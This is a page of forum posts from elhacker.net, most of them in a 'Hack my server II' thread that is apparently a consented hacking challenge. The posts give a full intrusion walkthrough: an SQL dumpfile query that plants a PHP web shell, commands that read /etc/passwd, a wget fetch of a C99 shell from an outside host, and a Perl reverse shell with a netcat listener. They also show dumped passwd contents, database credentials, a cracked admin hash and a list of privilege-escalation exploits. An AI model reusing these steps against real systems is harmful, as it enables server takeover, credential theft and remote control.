elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Introducción a la Factorización De Semiprimos (RSA)


  Mostrar Mensajes
Páginas: 1 ... 371 372 373 374 375 376 377 378 379 380 381 382 383 384 385 [386] 387 388 389 390 391 392 393 394 395 396 397 398 399 400 401 ... 768
3851  Seguridad Informática / Hacking / Re: Hack my server II en: 2 Agosto 2014, 10:39 am
Bueno, he intentado unos cuantos 'exploits' para escalar privilegios pero nada xD


Así que voy a poner como conseguir un reverse shell para los que estan perdidos...

Tenemos acceso a phpmyadmin y tenemos todos los privilegios. Podemos usar dumpfile para crear archivos y nuestro amable administrador, nos ha dado permisos de escritura en la carpeta uploads de wordpress.

Nos vamos phpmyadmin, y ejecutamos una query (pestaña SQL) simple.
Código
  1. SELECT '<?php echo "<pre>",system($_GET["q"]),"</pre>"; die(); ?>' INTO dumpfile '/var/www/wp-content/uploads/dshell.php'

Esto creara un archivo en /uploads (dshell.php) con una shell básica que permite ejecutar comandos del sistema directamente. Ahora podemos navegar hasta ese archivo y probar..

Código
  1. http://host.net/wp-content/uploads/dshell.php?q=cat /etc/passwd

Si todo ha ido bien, nos muestra el contenido de /etc/passwd.

Bien, ya tenemos una shell básica pero los permisos son de mysql en vez de www-data. Ademas, nuestra shell es bastante primitiva, cosa que no nos interesa.

Por eso, podríamos descargar la C99. Podríamos usar wget...

Código
  1. http://host.net/wp-content/uploads/dshell.php?q=wget -O dshell2.php 'http://www.c99txt.net/s/c99.txt'

Esto descargara un c99.txt del c99txt.net y lo guardara como dshell2.php.. pero ademas, puesto que lo ejecutamos desde PHP, su dueño sera www-data.

Si abrimos dshell2.php se nos abrira una bonita C99. Desde aquí vamos a proceder a descargar una shell inversa. Primero tenemos que descargar la propia shell. Una bastante comun es http://pentestmonkey.net/tools/web-shells/perl-reverse-shell

La descargamos, descomprimimos el .pl y lo vamos a editar. Tenemos que cambiar

Código
  1. my $ip = '127.0.0.1';
  2. my $port = 1234;

Por nuestros datos, es decir $ip por nuestra IP y $port por el puerto donde queremos que se conecte. Una vez editada, copiamos el contenido, nos vamos a la c99 y abajo en :: Make File ::, añadimos (a lo que ya hay), reverse.pl quedando así:
Código
  1. /var/www/wp-content/uploads/reverse.pl

Le damos al boton Create, en el textbox que aparecerá, pegamos la shell y le damos al boton Save.

Ahora, abajo en :: Command execute :: a la izquierda en la casilla ponemos chmod 777 reverse.pl, esto le dara permisos globales de ejecucion/escritura/lectura a la shell.


En nuestro sistema, tenemos que hacer que netcat escuche. Si no lo tienen instalado, busquen en google como instalarlo.
Código
  1. nc -l -v -n -p 1337

El -p 1337 es el puerto donde va a escuchar netcat por la shell. Lo ejecutamos en nuestra maquina, nos vamos a la C99 y en la casilla de comandos ejecutamos
Código
  1. perl reverse.pl

Si todo sale bien nos devolverá algo así..

Código:
Content-Length: 0
Connection: close
Content-Type: text/html

Content-Length: 45
Connection: close
Content-Type: text/html

Sent reverse shell to NuestraIP:ElPuerto<p>

Y si miramos a la terminal.. veremos


Aquí pueden meter cualquier comando que soporte el server.. el caso es que tengan permisos xD



Por otra parte, voy a listar los exploits que he probado/intentado..

half-nelson.c - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3848
Es fácil de encontrar en google... el problema es que aunque compile bien, falla cuando se ejecuta en el server..
Me tira [-] symbol table not available, aborting!

jessica_biel_naked_in_my_bed.c - http://downloads.securityfocus.com/vulnerabilities/exploits/27704.c
No me llega a compilar :/
27704.c:30:22: fatal error: asm/page.h: No such file or directory

14601.c - http://1337day.com/exploit/14601
Compila y ejecuta.. pero ahí se queda :/
--all-symbols < in.map > out.S = in.map no existe ·_·

59846.c - http://downloads.securityfocus.com/vulnerabilities/exploits/59846.c
No consigo compilar :/ No vi que usaba gcc 4.6 xD
gcc-4.6 -O2 59846.c && ./bb.out
Pero a la hora de ejecutar...
bb.out: 59846.c:51: sheep: Assertion `!close(fd)' failed.

59846-1.c - http://downloads.securityfocus.com/vulnerabilities/exploits/59846-1.c
Tampoco :/

59846-2.c - http://downloads.securityfocus.com/vulnerabilities/exploits/59846-2.c
Compila pero... es para Ubuntu 12.04... y a la hora de ejecutar
/usr/sbin/apache: 4: ./testaa: Permission denied | www-data/www-data    -r----x--t
Se vuelve tonto..


Saludos
3852  Seguridad Informática / Seguridad / Re: Problema en la deep web en: 2 Agosto 2014, 04:23 am
Yo lo siento por decírtelo pero si dicen que no han descargado absolutamente nada, te mienten.

Lo digo porque hay mas probabilidades de que hayan descargado algo a que hayan navegado por alguna web que haya explotado un 0-day y haya conseguido descargar esos archivos (aparte que no tiene sentido nada de eso).

Como @skapunky, opino que deberías hablar con el y hacerle ver el peligro en el que se mete...

Saludos
3853  Seguridad Informática / Hacking / Re: Hack my server II en: 2 Agosto 2014, 03:35 am
llamen a dimitrix, que instale gcc ·_·
xD

Saludos
3854  Seguridad Informática / Hacking / Re: Hack my server II en: 1 Agosto 2014, 21:52 pm
@MinusFour como conseguiste ejecutar PHP ?

Saludos
3855  Seguridad Informática / Hacking / Re: Hack my server II en: 1 Agosto 2014, 21:47 pm
¿El wp_config.php lo puedes ver usando el infile? :O

Se..

Código
  1. <?php
  2. // ** MySQL settings ** //
  3. define('DB_NAME', 'hackme2');    // The name of th...
  4. define('DB_USER', 'root');     // Your MySQL usern...
  5. define('DB_PASSWORD', ''); // ...and password
  6. define('DB_HOST', 'localhost');    // 99% chance y...
  7.  
  8. // You can have multiple installations in one data...
  9. $table_prefix  = 'wp_';   // Only numbers, letters...
  10.  
  11. // Change this to localize WordPress.  A correspon...
  12. // chosen language must be installed to wp-include...
  13. // For example, install de.mo to wp-includes/langu...
  14. // to enable German language support.
  15. define ('WPLANG', '');
  16.  
  17. /* That's all, stop editing! Happy blogging. */
  18.  
  19. define('ABSPATH', dirname(__FILE__).'/');
  20. require_once(ABSPATH.'wp-settings.php');
  21. ?>

Saludos
3856  Seguridad Informática / Hacking / Re: Hack my server II en: 1 Agosto 2014, 21:32 pm
El ID es 1, hay usuarios del 1 al 7. WHK, el tienes el PHPMyADMIN desprotegido para lanzar cualquier SQL xD, el wp-config.php

db_user = 'root';
db_password = '';
db_name = 'hackme2';
db_prefix = 'wp_';

Saludos
3857  Seguridad Informática / Hacking / Re: Hack my server II en: 1 Agosto 2014, 20:24 pm
Perdon xD

Bueno, tenemos acceso a PHPMyAdmin como root, tenemos todos los privilegios, esto lo podemos ver usando la pestaña Users de PHPMyAdmin.

root    127.0.0.1    No    ALL PRIVILEGES    Yes

Sabiendo esto, sabemos que tenemos acceso a funciones como LOAD DATA o DUMPFILE.

Por tanto, podemos crear una tabla, y usar LOAD DATA para ver el contenido de ficheros a los que tenemos acceso.

Código
  1. LOAD DATA INFILE '/etc/passwd' INTO TABLE BaseDeDatos.tabla;


PD: @xustyx has mirado el directorio de webmin ? Yo es que no lo encuentro por ninguna parte xD


PD2: He vuelto a poner la contraseña original del usuario admin de WP (aclaro que no fui yo el que la cambio).  Para quitaros trabajo inútil:
 a7c85c1a6114797d06425195899a8abe = 2bc11f

PD3: El directorio de webmin es /usr/share/webmin

Saludos
3858  Seguridad Informática / Hacking / Re: Hack my server II en: 1 Agosto 2014, 20:09 pm
Buenas


Algo de progreso...

/etc/passwd - sin contraseñas :(
Código
  1. root:x:0:0:root:/root:/bin/bash
  2. daemon:x:1:1:daemon:/usr/sbin:/bin/sh
  3. bin:x:2:2:bin:/bin:/bin/sh
  4. sys:x:3:3:sys:/dev:/bin/sh
  5. sync:x:4:65534:sync:/bin:/bin/sync
  6. games:x:5:60:games:/usr/games:/bin/sh
  7. man:x:6:12:man:/var/cache/man:/bin/sh
  8. lp:x:7:7:lp:/var/spool/lpd:/bin/sh
  9. mail:x:8:8:mail:/var/mail:/bin/sh
  10. news:x:9:9:news:/var/spool/news:/bin/sh
  11. uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
  12. proxy:x:13:13:proxy:/bin:/bin/sh
  13. www-data:x:33:33:www-data:/var/www:/bin/sh
  14. backup:x:34:34:backup:/var/backups:/bin/sh
  15. list:x:38:38:Mailing List Manager:/var/list:/bin/s...
  16. irc:x:39:39:ircd:/var/run/ircd:/bin/sh
  17. gnats:x:41:41:Gnats Bug-Reporting System (admin):/...
  18. nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
  19. libuuid:x:100:101::/var/lib/libuuid:/bin/sh
  20. fetchmail:x:101:65534::/var/lib/fetchmail:/bin/fal...
  21. sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
  22. syslog:x:103:106::/home/syslog:/bin/false
  23. klog:x:104:107::/home/klog:/bin/false
  24. bind:x:105:109::/var/cache/bind:/bin/false
  25. smmta:x:106:110:Mail Transfer Agent,,,:/var/lib/se...
  26. smmsp:x:107:111:Mail Submission Program,,,:/var/li...
  27. landscape:x:108:112::/var/lib/landscape:/bin/false
  28. mysql:x:109:113:MySQL Server,,,:/nonexistent:/bin/.

Saludos
3859  Seguridad Informática / Hacking / Re: Hack my server II en: 1 Agosto 2014, 19:23 pm
Es que lo mas gracioso de todo es que la carpeta /uploads no existe xD
Código
  1. http://host.net/wp-content/uploads/

Saludos
3860  Seguridad Informática / Hacking / Re: Hack my server II en: 1 Agosto 2014, 19:19 pm
el WP parece vulnerable por todos lados pero dado que no tiene permisos ni para editarse a si mismo, es un poco inutil intentar subir algo por ahi..

Via el PHPMyAdmin se puede subir mediante dumpfile al directorio /tmp .. si solo pudieramos encontrar un LFI, la shell estaria subida.

Saludos
Páginas: 1 ... 371 372 373 374 375 376 377 378 379 380 381 382 383 384 385 [386] 387 388 389 390 391 392 393 394 395 396 397 398 399 400 401 ... 768
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines